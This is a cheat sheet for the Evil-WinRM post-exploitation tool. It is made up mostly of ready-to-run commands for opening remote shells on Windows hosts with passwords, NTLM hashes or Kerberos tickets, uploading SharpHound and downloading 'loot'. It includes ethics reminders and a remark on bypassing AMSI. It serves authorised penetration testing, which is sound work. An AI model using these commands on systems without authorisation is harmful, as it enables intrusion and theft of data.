Evil-WinRM Cheat Sheet
WinRM shell and file transfer for post-exploitation on Windows hosts.
Overview
Evil-WinRM provides an interactive WinRM shell on Windows targets when you have valid credentials or hashes—common after nxc/crackmapexec finds WinRM access. Ethics: remote shells alter systems and leave logs; authorized pentest and lab use only.
Install
sudo apt install evil-winrmor gem:
gem install evil-winrmevil-winrm -hEssential commands
evil-winrm -i 10.10.10.10 -u administrator -p 'Password1!'evil-winrm -i 10.10.10.10 -u admin -H 31d6cfe0d16ae931b73c59d7e0c089c0evil-winrm -i host.corp.local -u user@corp.local -p pass -c 5986 -SCommon workflows
Password auth —
evil-winrm -i 10.10.10.10 -u administrator -p 'Password1!'Pass-the-hash —
evil-winrm -i 10.10.10.10 -u administrator -H 31d6cfe0d16ae931b73c59d7e0c089c0Inside shell:
*Evil-WinRM* PS> upload /tmp/SharpHound.exe C:\Users\Public\SharpHound.exe*Evil-WinRM* PS> download C:\Users\Public\loot.zip /tmp/loot.zipRun PowerShell scripts —
evil-winrm -i 10.10.10.10 -u admin -p pass -s /opt/scriptsSSL / alternate port —
evil-winrm -i 10.10.10.10 -u admin -p pass -c 5986 -Sevil-winrm -i 10.10.10.10 -u admin -p pass -P 5985Kerberos (with ticket) —
export KRB5CCNAME=/tmp/user.ccacheevil-winrm -i dc01.corp.local -r corp.localFlags reference
-i | Target IP/hostname |
|---|---|
-u / -p | User / password |
-H | NTLM hash |
-c | Port |
-S | SSL |
-s | Scripts path |
-r | Kerberos realm |
-k | Private key (cert auth) |
Tips
- Ethics: WinRM is monitored (Microsoft-Windows-WinRM/Operational); use engagement-specific accounts when possible.
- Requires WinRM enabled and firewall允许; nxc winrm confirms access first.
- AMSI may block some scripts—use in-scope bypass techniques only where permitted.
- Prefer impacket-wmiexec or smbexec when WinRM is disabled.